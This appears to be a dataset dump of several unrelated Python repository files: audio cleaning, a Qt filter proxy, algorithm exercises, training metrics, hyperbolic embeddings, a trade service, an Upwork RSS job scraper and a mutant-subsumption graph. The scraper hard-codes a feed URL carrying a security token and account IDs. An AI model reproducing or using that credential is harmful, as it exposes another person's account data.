fn+'.wav')\n if os.path.exists(dst_path):\n return\n wavfile.write(dst_path, rate, waveform)\n\ndef prepare(args):\n src_root = args.src_root\n dst_root = args.dst_root\n tl = args.tl\n\n check_dir(dst_root)\n classes = os.listdir(src_root)\n\n for _cls in classes:\n target_dir = os.path.join(dst_root, _cls)\n check_dir(target_dir)\n\n for sub_dir in os.listdir(os.path.join(src_root, _cls)):\n src_dir = os.path.join(src_root, _cls, sub_dir)\n\n for fn in tqdm(os.listdir(src_dir)):\n src_fn = os.path.join(src_dir, fn)\n\n if args.mode == 'sox' :\n waveform, sample_rate = read_file(src_fn)\n # Torch Vad only trim the end of the signal \n waveform_reversed, sample_rate = torchaudio.sox_effects.apply_effects_tensor(waveform, sample_rate, [[\"reverse\"]])\n vad = torchaudio.transforms.Vad(sample_rate=sample_rate, trigger_level=tl)\n waveform_reversed_front_trim = vad(waveform_reversed)\n waveform_end_trim, sample_rate = torchaudio.sox_effects.apply_effects_tensor(\n waveform_reversed_front_trim, sample_rate, [[\"reverse\"]]\n )\n waveform = vad(waveform_end_trim)\n\n resampler = torchaudio.transforms.Resample(sample_rate, args.sr)\n resampler.to('cpu')\n waveform = resampler(waveform)\n\n save_sample(waveform, args.sr, target_dir, fn, 0)\n else:\n waveform, sample_rate = librosa.load(src_fn, sr = args.sr)\n if args.mode == 'librosa' :\n clean_wav, index = librosa.effects.trim(y=waveform, top_db=args.threshold, ref = 1)\n else:\n clean_wav = clean(y=waveform, sr = sample_rate , intensity = 1)\n if clean_wav.any():\n if clean_wav.shape[0] < args.sr:\n clean_wav = resample(clean_wav, orig_sr = sample_rate, target_sr = args.sr)\n save_sample_librosa(clean_wav, args.sr, target_dir, fn, 0)\n else:\n # We try a higher intensity\n clean_wav = clean(y=clean_wav, sr = sample_rate , intensity = 3)\n if clean_wav.any():\n clean_wav = resample(clean_wav, orig_sr = sample_rate, target_sr 
= args.sr)\n save_sample_librosa(clean_wav, args.sr, target_dir, fn, 0)\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Cleaning audio data')\n parser.add_argument('--mode', type=str, default='librosa',\n help='vad, sox, or librosa')\n parser.add_argument('--src_root', type=str, default='data/raw',\n help='directory of audio files in total duration')\n parser.add_argument('--dst_root', type=str, default='data/cleaned',\n help='directory to put audio files split by delta_time')\n parser.add_argument('--sr', type=int, default=16000, #default=16000\n help='rate to downsample audio')\n\n parser.add_argument('--tl', type=str, default=7.5, #default=7.5\n help='trigger level for torch vad')\n parser.add_argument('--threshold', type=str, default=55, \n help='threshold top db for librosa trim')\n args, _ = parser.parse_known_args()\n\n prepare(args)\n\n","repo_name":"hedeshy/CNVVE","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"32595653444","text":"from __future__ import annotations\n\nfrom prettyqt import core\nfrom prettyqt.utils import get_repr\n\n\nclass RangeFilterProxyModel(core.SortFilterProxyModel):\n ID = \"range_filter\"\n\n def __init__(self, min_value=None, max_value=None, **kwargs):\n self._min_value = min_value\n self._max_value = max_value\n super().__init__(**kwargs)\n\n def __repr__(self):\n return get_repr(self, self.get_range)\n\n def filterAcceptsRow(self, source_row: int, parent: core.ModelIndex) -> bool:\n column = self.filterKeyColumn()\n role = self.filterRole()\n source_model = self.sourceModel()\n idx = source_model.index(source_row, column, parent)\n value = source_model.data(idx, role)\n if self._min_value is not None and value < self._min_value:\n return False\n return self._max_value is None or value <= self._max_value\n\n def set_min_value(self, value: float | int | None):\n self._min_value = value\n self.invalidateRowsFilter()\n\n def get_min_value(self) -> float | int:\n if self._min_value is None:\n return -float(\"inf\")\n return self._min_value\n\n def set_max_value(self, value: float | int):\n self._max_value = value\n self.invalidateRowsFilter()\n\n def get_max_value(self) -> float | int:\n if self._max_value is None:\n return float(\"inf\")\n return self._max_value\n\n def set_range(self, rng: tuple[float | int | None, float | int | None]):\n self._min_value, self._max_value = rng\n self.invalidateRowsFilter()\n\n def get_range(self) -> tuple[float | int | None, float | int | None]:\n return (self._min_value, self._max_value)\n\n min_value = core.Property(\n float,\n get_min_value,\n set_min_value,\n doc=\"Minimum allowed value\",\n )\n max_value = core.Property(\n float,\n get_max_value,\n set_max_value,\n doc=\"Maximum allowed value\",\n )\n\n\nif __name__ == \"__main__\":\n from prettyqt import constants, widgets\n\n app = widgets.app()\n proxy = RangeFilterProxyModel(True, filter_role=constants.CHECKSTATE_ROLE)\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/itemmodels/proxies/rangefilterproxymodel.py","file_name":"rangefilterproxymodel.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"17646917075","text":"# Find a pair with the given difference https://www.geeksforgeeks.org/find-a-pair-with-the-given-difference/\n\ndef findPair(arr,n):\n \n size = len(arr)\n \n 
# Initialize positions of two elements\n i,j = 0,1\n \n # Search for a pair\n while i < size and j < size:\n \n if i != j and arr[j]-arr[i] == n:\n print(f\"Pair found: ({arr[i]} , {arr[j]})\")\n return True\n \n elif arr[j] - arr[i] < n:\n j+=1\n else:\n i+=1\n print (\"No pair found\")\n return False\n\nfindPair([1, 8, 30, 40, 100], 60) ","repo_name":"radomirbrkovic/algorithms","sub_path":"search/exercises/find-a-pair-with-the-given-difference.py","file_name":"find-a-pair-with-the-given-difference.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30066501817","text":"\"\"\"\r\n\n\nWrite a function that makes the **first number as large as possible** by\nswapping out its digits for digits in the second number.\n\nTo illustrate:\n\n max_possible(9328, 456) ➞ 9658\n # 9658 is the largest possible number built from swaps from 456.\n # 3 replaced with 6 and 2 replaced with 5.\n\n### Examples\n\n max_possible(523, 76) ➞ 763\n \n max_possible(9132, 5564) ➞ 9655\n \n max_possible(8732, 91255) ➞ 9755\n\n### Notes\n\n * Each digit in the second number can only be used once.\n * Zero to all digits in the second number may be used.\n\n\"\"\"\r\n\ndef max_possible(n1, n2):\n K1=[int(i) for i in str(n1)]\n K2=[int(i) for i in str(n2)]\n for i,n in enumerate(K1):\n if len(K2)<=0:\n break\n if n < max(K2):\n K1[i] = max(K2)\n K2.remove(K1[i])\n return int(''.join([str(i) for i in K1]))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"FeNrBCG9rSdNeJTuX_18.py","file_name":"FeNrBCG9rSdNeJTuX_18.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14981686597","text":"import torch\nimport pandas as pd\nfrom os.path import join\n\nclass Metric_tracker():\n def __init__(self, split, class_to_name, log_dir, set_k=None, hierarchical=False, fine_to_coarse=None):\n self.split = split\n self.class_to_name = class_to_name\n self.log_dir = log_dir\n self.set_k = set_k\n self.hierarchical = hierarchical\n self.fine_to_coarse = fine_to_coarse\n if self.set_k is not None:\n if 1 not in self.set_k:\n self.set_k.append(1)\n self.set_k.sort()\n else:\n self.set_k = [1,3,5,10]\n self.reset()\n\n def reset(self):\n self.topk_tp = {}\n self.top1_fp = torch.zeros(len(self.class_to_name), dtype=torch.int)\n self.samples_per_class = torch.zeros(len(self.class_to_name), dtype=torch.int)\n for k in self.set_k:\n self.topk_tp[k] = torch.zeros(len(self.class_to_name), dtype=torch.int)\n self.losses = []\n if self.fine_to_coarse is not None:\n self.coarse_tp = torch.zeros(len(set(self.fine_to_coarse.values())), dtype=torch.int)\n else:\n self.coarse_tp = torch.zeros(1, dtype=torch.int)\n \n def update_topk_TruePositives(self, y_true, y_pred):\n predicted_classes = torch.argsort(y_pred, axis=-1, descending=True)\n for k in self.set_k:\n for gt, pred in zip(y_true, predicted_classes):\n if k == 1: #At first iteration.\n self.samples_per_class[gt.item()]+=1 #counting class item.\n top_k = pred[:k]\n self.topk_tp[k][gt.item()]+=torch.sum(gt == top_k).item()\n self.top1_fp[gt.item()]+= torch.sum(gt != top_k).item()\n else:\n top_k = pred[:k]\n self.topk_tp[k][gt.item()]+=torch.sum(gt == top_k).item()\n\n def update_coarse_TruePositives(self, y_true, y_pred):\n predicted_classes = torch.argsort(y_pred, axis=-1, descending=True)\n for gt, pred in zip(y_true, predicted_classes):\n pred_coarse_id = 
self.fine_to_coarse[str(pred[0].item())]\n gt_coarse_id = self.fine_to_coarse[str(gt.item())]\n self.coarse_tp[gt_coarse_id]+=(pred_coarse_id == gt_coarse_id)\n\n def update(self, loss, y_true, y_pred):\n if self.hierarchical:\n y_true = y_true[1].cpu()\n y_pred = y_pred[1].cpu() \n else:\n y_true = y_true.cpu()\n y_pred = y_pred.cpu()\n self.update_topk_TruePositives(y_true, y_pred)\n \n if self.fine_to_coarse is not None:\n self.update_coarse_TruePositives(y_true, y_pred)\n \n self.losses.append(loss)\n\n def result(self):\n samples_per_class, zero_classes = self.cal_samples()\n precisions = self.cal_precision(samples_per_class)\n recalls = self.cal_recall(samples_per_class)\n topk_acc = self.cal_topk_accuracy(samples_per_class) \n epoch_loss = self.cal_epoch_loss()\n coarse_acc = self.cal_coarse_accuracy(samples_per_class)\n return {\"samples_per_class\":samples_per_class,\n \"zero_classes\":zero_classes,\n \"precisions\": precisions,\n \"recalls\": recalls,\n \"topk_acc\": topk_acc,\n \"coarse_acc\": coarse_acc,\n \"epoch_loss\": epoch_loss}\n\n def to_writer(self, writer, epoch, optimizer=None):\n result = self.result()\n writer.add_scalar(f\"Loss/{self.split}\", result[\"epoch_loss\"].item(), epoch)\n writer.add_scalar(f\"acc/{self.split}\", result[\"topk_acc\"][1].item(), epoch)\n writer.add_scalar(f\"balanced_acc/{self.split}\", torch.mean(result[\"recalls\"]).item(), epoch)\n writer.add_scalar(f\"coarse_acc/{self.split}\", result[\"coarse_acc\"].item(), epoch)\n for k in self.set_k:\n writer.add_scalar(f\"top-{k} acc/{self.split}\", result[\"topk_acc\"][k].item(), epoch)\n if optimizer is not None:\n writer.add_scalar(f\"learning_rate/{self.split}\", optimizer.param_groups[0][\"lr\"], epoch)\n\n def to_csv(self, path):\n result = self.result()\n \n df1 = pd.DataFrame({\"name\" : list(self.class_to_name.values()), \n \"samples_per_class\" : result[\"samples_per_class\"].numpy(),\n \"precisions\" : result[\"precisions\"].numpy(),\n \"recalls\" : result[\"recalls\"].numpy()})\n df2 = pd.DataFrame({\"name\" : [k for k in self.set_k]+[\"balanced_acc\", \"coarse_acc\", \"loss\"], \n \"metric\" : [result[\"topk_acc\"][k] for k in self.set_k]+[torch.mean(result[\"recalls\"]).item(), result[\"coarse_acc\"].item(), result[\"epoch_loss\"].item()]})\n df1.to_csv(join(path, f\"categorical_metrics_{self.split}.csv\"))\n df2.to_csv(join(path, f\"overall_metric_{self.split}.csv\"))\n\n\n def cal_samples(self):\n #If there is no samples in a class, record it at zero_classes\n #num_samples should be larger than 0 to avoid divided by zero when you calculate metrics.\n samples_per_class = self.samples_per_class\n zero_classes = torch.where(samples_per_class==0)[0] #Detect no sample classes.\n samples_per_class = torch.where(samples_per_class==0, torch.tensor(1,dtype=torch.int), samples_per_class)\n return samples_per_class, zero_classes\n\n def cal_precision(self, samples_per_class):\n return torch.div(self.topk_tp[1], self.topk_tp[1]+self.top1_fp)\n\n def cal_recall(self, samples_per_class):\n return torch.div(self.topk_tp[1], samples_per_class)\n\n def cal_coarse_accuracy(self, samples_per_class):\n coarse_acc = torch.div( torch.sum(self.coarse_tp), torch.sum(samples_per_class))\n return coarse_acc\n \n def cal_topk_accuracy(self, samples_per_class):\n topk_acc = {}\n for k in self.set_k:\n topk_acc[k] = torch.div( torch.sum(self.topk_tp[k]), torch.sum(samples_per_class))\n return topk_acc\n\n def cal_epoch_loss(self):\n return 
torch.mean(torch.stack(self.losses))","repo_name":"hukim1112/uos_plantclassification","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15170586562","text":"'''Note: Try to solve this task in O(n) time using O(1) additional space, where n is the number of elements in the list, since this is what you'll be asked to do during an interview.\n\nGiven a singly linked list of integers l and an integer k, remove all elements from list l that have a value equal to k.\n\nExample\n\nFor l = [3, 1, 2, 3, 4, 5] and k = 3, the output should be\nremoveKFromList(l, k) = [1, 2, 4, 5];\nFor l = [1, 2, 3, 4, 5, 6, 7] and k = 10, the output should be\nremoveKFromList(l, k) = [1, 2, 3, 4, 5, 6, 7].\n'''\n\n# Definition for singly-linked list:\n# class ListNode(object):\n# def __init__(self, x):\n# self.value = x\n# self.next = None\n#\ndef removeKFromList(l, k):\n if(l == None):\n return l\n while(l != None and l.value == k):\n l = l.next \n temp = l\n while(temp != None and temp.next != None):\n if(temp.next.value == k):\n temp.next = temp.next.next \n else:\n temp = temp.next\n return l\n \n","repo_name":"shaduk/algorithms-datastructures","sub_path":"CodeFights/RemoveKelement.py","file_name":"RemoveKelement.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29723793302","text":"#!/usr/bin/python3\nimport feedparser\nimport time\nimport urllib\n\nimport socket\nimport socks \n#import python_postgresql.insert_jobs_list\nfrom python_postgresql import insert_jobs_list\n\n#pip install feedparser\n#pip install pysocks\n\n\nr = urllib.request.urlopen('http://icanhazip.com')\nprint(r.read()) # check ips\n\nrss_url = \"https://www.upwork.com/ab/feed/topics/rss?securityToken=f95b63738835bc9997ec12f0401d48a82ebfebfc80616ce6bde4c1f3069dacc76c1b023b0fa37a4fe44262caae43bfbf8d35c9a8f60340545eef40dddf551148&userUid=454220209633980416&orgUid=454220209642369025\"\n\nsend_to_telegram = []\ncurrent_feed = [{'title':'value'}]\ndef update_feed(current_feed):\n\n updated_feed = feedparser.parse( rss_url )\n current_titles = []\n if updated_feed.status != 200:\n print('response code: ' + str(updated_feed.status))\n for current_entries in current_feed:\n current_titles.append(current_entries['title'])\n for new_items in updated_feed.entries:\n if new_items.title not in current_titles:\n send_to_telegram.append(new_items)\n for message in send_to_telegram:\n details = message['summary_detail']['value']\n details = details.replace('
', '')\n        details = details.replace('•', '')\n        details = details.replace(' ', '')\n        details = details.replace('&', '')\n        details = details.replace(''', '')\n        details = details.replace('click to apply','')\n        details = details.replace('Budget','\\n**Budget**')\n        details = details.replace('Posted On','\\nPosted On')\n        details = details.replace('Category','\\nCategory')\n        details = details.replace('Country','\\nCountry')\n        details = details.replace('Skills','\\nSkills')\n        job_list=(message['title'], details, 'add tags')\n        insert_jobs_list(job_list)\n\n    for every in send_to_telegram:\n        current_feed.append(every)\n    return current_feed\n    \nwhile True:\n    if len(current_feed) > 50:\n        to_remove = len(current_feed) - 50\n        while to_remove != 0:\n            current_feed.pop(to_remove - 1)\n            to_remove-=1 \n        print('after cleaning:')\n        print(len(current_feed))\n    current_feed = update_feed(current_feed)\n    time.sleep(10)\n","repo_name":"r0mk/shelter","sub_path":"upwork_rss.py","file_name":"upwork_rss.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31233055292","text":"import tqdm\nimport torch\nfrom torch import nn\n\nfrom function_tools import poincare_module, gmm_tools\nfrom optim_tools import optimizer\nfrom function_tools import poincare_function as pf\n\n\nclass RiemannianEmbedding(nn.Module):\n    def __init__(self, n_exemple, cuda=False, lr=1e-2, verbose=True, negative_distribution=None):\n        super(RiemannianEmbedding, self).__init__()\n        self.cuda = cuda\n        self.N = n_exemple\n        self.W = poincare_module.PoincareEmbedding(n_exemple, 2)\n        if(self.cuda):\n            self.W.cuda()\n        self.optimizer = optimizer.PoincareSGDExp(self.W.parameters(), lr=lr)\n        self.verbose = verbose\n        self.d = pf.poincare_distance_dg\n        if(negative_distribution is None):\n            self.n_dist = torch.distributions.Categorical(torch.ones(self.N)/self.N)\n        else:\n            self.n_dist = negative_distribution\n\n    def forward(self, x):\n        return self.W(x)\n\n    def get_PoincareEmbeddings(self):\n        return self.W.l_embed.weight.data\n\n    def set_lr(self, lr):\n        for g in self.optimizer.param_groups:\n            g['lr'] = lr\n    \n    def fit(self, dataloader, alpha=1.0, beta=1.0, gamma=0.0, pi=None, mu=None, sigma=None, max_iter=100,\n            negative_sampling=5):\n        \n        if(pi is None):\n            gamma = 0.0\n\n        progress_bar = tqdm.trange(max_iter) if(self.verbose) else range(max_iter)\n        for i in progress_bar:\n            loss_value1, loss_value2, loss_value3, loss_pdf3 = 0,0,0,0\n            for example, neigbhors, walks in dataloader:\n                # # print(example.size(), neigbhors.size(), walks.size())\n                # self.optimizer.zero_grad()\n                # if(self.cuda):\n                #     example = example.cuda()\n                #     neigbhors = neigbhors.cuda()\n                #     walks = walks.cuda()\n                #     if(pi is not None):\n                #         pi = pi.cuda()\n                #         sigma = sigma.cuda()\n                #         mu = mu.cuda()\n                # r_example = example.unsqueeze(1).expand_as(neigbhors)\n                # me, mw = self.W(r_example), self.W(neigbhors)\n\n                # loss_o1 = -(torch.log(torch.exp(-self.d(me, mw)))).sum(-1).sum(-1).mean()\n\n                mw = self.W(walks)\n                positive_d = (self.d(mw[:,:,0], mw[:,:,1]))\n\n                with torch.no_grad():\n                    negative = self.n_dist.sample(sample_shape=(walks.size(0), walks.size(1), negative_sampling))\n                    if(self.cuda):\n                        negative = negative.cuda()\n                negative = self.W(negative.long())\n                negative_d = self.d(mw[:,:,0].unsqueeze(2).expand_as(negative), negative, j=-1) \n                with torch.no_grad():\n                    grad_o2p = pf.poincare_distance_dg_b(mw[:,:,0], mw[:,:,1],p=2) \n                    p_d = torch.sigmoid(pf.poincare_distance_dg_f(mw[:,:,0], mw[:,:,1]))\n                    p_o = 
mw[:,:,0].expand_as(negative)\n n_d = torch.sigmoid(-pf.poincare_distance_dg_f(p_o,negative))\n grad_o2n = pf.poincare_distance_dg_b(p_o, negative,p=2)\n\n # # print(\"1 ->\", positive_d.sigmoid().view(-1))\n # # loss_o2 += (negative_d * (-negative_d).sigmoid().detach()).sum(-1)\n # loss_o2 = loss_o2.sum()\n # loss = loss_o2 \n # if(gamma > 0):\n # r_example = self.W(example).squeeze()\n # pi_z = pi[example].squeeze()\n # loss_o3 = (-torch.log(1e-4 + gmm_tools.weighted_gmm_pdf(pi_z.detach(), r_example, mu.detach(), sigma.detach(), self.d))).mean()\n # loss_value3 = loss_o3.item()\n # loss_pdf3 = torch.exp(-loss_o3).item()\n # loss += gamma * loss_o3\n\n\n # loss_value1 = loss_o1.item()\n # loss_value2 = loss_o2.item()\n # loss.backward()\n self.optimizer.step()\n if(self.verbose):\n progress_bar.set_postfix({\"O1\":alpha*loss_value1, \"O2\":beta *loss_value2, \"O3\":gamma *loss_value3, \"PDF\":loss_pdf3})\n print(self.W.l_embed.weight)\n print(self.W(torch.arange(self.N).cuda()).norm(2,-1))","repo_name":"tgeral68/EuuzAIiFDS","sub_path":"embedding_tools/poincare_pr_embeddings_graph.py","file_name":"poincare_pr_embeddings_graph.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38631878861","text":"from flask import Response\n\nfrom files_storage import FilesStorage\nfrom trading_source import TradingSource\nfrom transactions_calculator import TransactionsCalculator\n\n\nclass TradeService:\n def __init__(self, files_storage: FilesStorage, trading_source: TradingSource,\n transactions_calculator: TransactionsCalculator):\n self.files_storage = files_storage\n self.trading_source = trading_source\n self.transactions_calculator = transactions_calculator\n\n def trade(self, request):\n status = self.__validate_attachment(request)\n if status is not None:\n return status\n\n uploaded_file = request.files['file']\n file_path = self.files_storage.save(uploaded_file)\n self.trading_source.to_memory(file_path)\n return self.transactions_calculator.calculate(self.trading_source)\n\n def __validate_attachment(self, request):\n if 'file' not in request.files or request.files['file'] == '':\n return Response(\n \"Missing trading file\",\n status=400,\n )\n\n return None\n","repo_name":"alex-tilkin/edgify","sub_path":"trade_service.py","file_name":"trade_service.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40639434015","text":"import csv\nfrom typing import Set, Optional\n\n\nclass Node:\n tests: Set[int]\n mutant_identifier: Set[int]\n children: Set[int]\n parents: Set[int]\n size: int\n \"\"\"The node object that represents mutants\n All the functions in this .py file assume that mutants \n that are passed in are killable \n \n \"\"\"\n\n def __init__(self, mutant_name=None, tests=None):\n \"\"\" Initiates node object\n\n Creates a node that represents mutants. If the mutant_identifier and/or\n tests are passed in, it will set self.mutant_identifier and self.tests\n to the values passed in. 
Otherwise, the function initiates them as the\n empty set (Set[int]).\n\n\n\n Additionally, it initiates self.children and self.parents as empty\n sets (Set[int]).\n\n Parameters:\n mutant_identifier: set[int]\n The mutant's identifier is stored as a set so that when two\n indistinguishable mutants are merged their name, they could\n easily be identifiable (default None).\n tests: set[int]\n A set of test identifiers that fail for the mutant represented\n by this node (default None)\n\n Attributes:\n self.mutant_identifier: set[int]\n The mutant's identifier is stored as a set so that when two\n indistinguishable mutants are merged their name, they could\n easily be identifiable (default None).\n self.tests: set[int]\n A set of test identifiers that fail for the mutant represented\n by this node (default set[int])\n self.children: set[int]\n A set of nodes that are subsumed directly by this node. Children\n nodes represent mutants that are killed by a superset of tests\n that also kill this mutant(node). (default set[int])\n self.parents: set[int]\n A set of nodes that directly subsume this node. Parent nodes\n represent mutants that are killed by a subset of tests\n that also kill this mutant(node). (default set[int])\n\n \"\"\"\n if mutant_name is None:\n mutant_name = set()\n self.mutant_identifier = mutant_name\n if tests is None:\n tests = set()\n self.tests = tests\n self.children = set()\n self.parents = set()\n self.size = 1\n\n def get_descendents(self):\n result: Optional[set()] = set()\n for child in self.children:\n # add the child itself\n result.add(child)\n # if it has children add those too\n if child.children != set():\n result = result.union(child.get_descendents())\n return result\n\n def determine_mutant_subsumption(self, new_node, graph):\n\n \"\"\"Determines the new_node's placement compared to this node.\n\n Assumes that the nodes that are passed in are related and that this\n node and new_node are distinguishable nodes.\n\n If the nodes are distinguishable, and if the test identifiers in this\n node are a subset of the test identifiers in new_node, it will call\n update_dominant on this node. Otherwise, it will call update_subsumed.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph\n graph: Graph\n A graph containing nodes that represent mutants\n\n \"\"\"\n # Determining dominance vs. 
subsumption using test identifiers\n if self.tests.issubset(new_node.tests):\n self.update_dominant(new_node, graph)\n\n else:\n self.update_subsumed(new_node, graph)\n\n def update_dominant(self, new_node, graph):\n \"\"\"Updates the dominant node on the graph with new_node.\n\n Assumes that this node is dominant with respect to the new_node.\n\n If this node has any children, for any given child of this node,\n it checks whether the child's set of test identifiers is a subset or\n superset of new_node's set of test identifiers.\n\n If child's set of test identifiers is a superset of new_node's test\n identifiers add_children_in_between is called on this node.\n\n If this node doesn't have any children, the function calls\n add_children on this node.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph and is subsumed by this node\n graph: Graph\n A graph containing nodes that represent mutants\n \"\"\"\n # Check whether this node has children, and if yes, explore the\n # possibility of placing new_node relative to those children on the\n # graph\n # In a large graph, this case is more likely. Therefore, it is the\n # first possible choice in the conditional\n\n if len(self.children):\n children_can_relate = False\n for child in self.children.copy():\n if child.tests.issubset(new_node.tests):\n children_can_relate = True\n if child == new_node:\n continue\n else:\n # Determining where new_node is going to be on the graph\n # relative to the self's child\n child.determine_mutant_subsumption(new_node, graph)\n elif child.tests.issuperset(new_node.tests):\n children_can_relate = True\n # Adding node\n self.add_children_in_between(new_node, child)\n if not children_can_relate:\n self.add_children(new_node)\n # Base case: if this node doesn't have children, just add new_node as\n # its child\n else:\n self.add_children(new_node)\n\n def update_subsumed(self, new_node, graph):\n \"\"\"Updates the subsumed node on the graph with new_node.\n\n Assumes that this node is subsumed with respect to the new_node.\n\n If this node has any parents, for any given parent of this node,\n it checks whether the parent's set of test identifiers is a subset or\n superset of new_node's set of test identifiers.\n\n If the parents's set of test identifiers is a subset of new_node's\n test identifiers add_children_in_between is called on this node.\n\n If this node doesn't have any children, the function calls\n add_children on this node.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph and is subsumed by this node\n graph: Graph\n A graph containing nodes that represent mutants\n \"\"\"\n # Check whether this node has parents, and if yes, explore the\n # possibility of placing new_node relative to those parents on the\n # graph\n # In a large graph, this case is more likely. 
Therefore, it is the\n # first possible choice in the conditional\n if len(self.parents):\n parents_can_relate = False\n for parent in self.parents.copy():\n if parent.tests.issuperset(new_node.tests):\n parents_can_relate = True\n if parent == new_node:\n continue\n else:\n # adding new_node as a relative of self's child\n parent.determine_mutant_subsumption(new_node, graph)\n elif parent.tests.issubset(new_node.tests):\n parents_can_relate = True\n parent.add_children_in_between(new_node, self)\n if not parents_can_relate:\n new_node.add_children(self)\n\n # Base case: if self doesn't have parents, just add new_node as its\n # parent (or add self as new_node's child)\n else:\n new_node.add_children(self)\n\n def add_children(self, new_node):\n \"\"\"Adds a child to this node\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the\n graph\n\n \"\"\"\n self.children.add(new_node)\n new_node.parents.add(self)\n\n def add_children_in_between(self, new_node, child):\n \"\"\"Splits the edges between this node and its child to add new_node in\n between\n\n It changes and adds edges to the graph such that this node becomes\n the parent for new_node, and new_node becomes the parent of the child\n while preserving all other existing edges\n\n To do so, the function removes direct edges between this node and its\n child and adds a pair of edges between new_node and this node and\n another pair of edges between new_node and child\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the\n graph\n child: Node\n A child node of this node that already exists on the graph\n \"\"\"\n new_node.parents.add(self)\n new_node.children.add(child)\n self.children.add(new_node)\n self.children.remove(child)\n child.parents.add(new_node)\n child.parents.remove(self)\n\n def merge_indistinguishable_nodes(self, n2, graph):\n \"\"\"Merges two nodes that represent mutants in a given graph\n\n Parameters:\n n2: Node\n Second mutant\n graph: Graph\n The graph containing these mutants\n \"\"\"\n self.mutant_identifier = self.mutant_identifier.union(\n n2.mutant_identifier)\n self.size += 1\n\n def is_distinguishable_from(self, n2):\n \"\"\"Determines whether two nodes are distinguishable using direct\n comparison and their test identifiers.\n\n Parameters:\n n2: Node\n The mutant being compared to this mutant\n\n Return:\n True if the this node and n2 represent mutants that are\n distinguishable; False otherwise.\n \"\"\"\n\n return (self != n2) and (self.tests != n2.tests)\n\n\nclass Graph:\n \"\"\"The graph object that represents the mutant domination graph\n \"\"\"\n\n def __init__(self):\n \"\"\"Initiates the graph object\n\n Attributes:\n self.nodes : List[Node]\n A list of nodes that represents mutants that are going to be\n added to the graph if create_edges is called on it\n \"\"\"\n self.nodes = []\n\n def add_node(self, new_node):\n \"\"\"Adds a given node to the list of the nodes on the graph\n\n If the node that is passed in doesn't have an equivalent node in class\n already, this function adds the given node to the list of nodes\n present in the graph, but it doesn't create a relation between the\n existing nodes and the newly added node.\n\n Parameters:\n new_node: Node\n Node that is being added to this graph\n\n \"\"\"\n if new_node not in self.nodes:\n\n for node in self.nodes:\n if not new_node.is_distinguishable_from(node):\n node.merge_indistinguishable_nodes(new_node, self)\n break\n\n else:\n self.nodes.append(new_node)\n\n 
def create_edges(self):\n        \"\"\"Creates edges and connects the nodes that are already placed in the\n        graph.\n\n        Comparing all the nodes in the graph, it determines whether a\n        relationship could exist between them by checking\n        whether the sets of their test identifiers are a subset or superset\n        of each other.\n\n        \"\"\"\n        for n1 in range(0, len(self.nodes)):\n\n            for n2 in range(0, n1):\n\n                # If at least the set of test identifiers in one of them is\n                # not a subset of the other one, move on to the next node\n\n                if not (self.nodes[n2].tests.issubset(\n                        self.nodes[n1].tests) or\n                        self.nodes[n2].tests.issuperset(\n                            self.nodes[n1].tests)):\n                    continue\n\n                # If the nodes can have edges between them, determine their\n                # subsumption relation\n                else:\n                    self.nodes[n2].determine_mutant_subsumption(\n                        self.nodes[n1],\n                        self)\n\n    def get_tests_covered(self, node):\n        \"\"\"Returns all the tests covered by a mutant\n\n        Recursively iterates from a node representing a dominator mutant to\n        nodes with no children identifiers at the bottom of the subsumption\n        graph.\n\n        It then returns all the test identifiers for the nodes with no\n        children identifiers that are subsumed by the first node that was\n        passed in.\n\n        If a node has no children identifiers, then its test identifiers are\n        returned.\n\n        Parameters:\n            node: Node\n                A node on the graph set[int]\n\n        Returns:\n            tests_covered: set[int]\n        \"\"\"\n\n        if node.children == set():\n            return node.tests\n        else:\n            tests_covered = set()\n            for child in node.children:\n                tests_covered = tests_covered.union(\n                    self.get_tests_covered(child))\n\n            return tests_covered\n\n\ndef calculate_dominating_mutants(kill_map):\n    \"\"\"Calculates a dominating set of mutants\n\n    Calculates the dominating set of mutants in a graph given a mapping from\n    mutant identifiers to a set of identifiers of tests that kill each mutant.\n\n    This function initializes a graph and adds all the mutant identifiers\n    with their test identifiers in the kill map as initialized nodes to the\n    graph.\n\n    It then connects these nodes by establishing relationships between\n    nodes that contain test identifiers that are a subset or superset of each\n    other.\n\n    Finally, it returns the graph containing these mutants and two minimal\n    sets of mutants which contain a minimal set of test identifiers. 
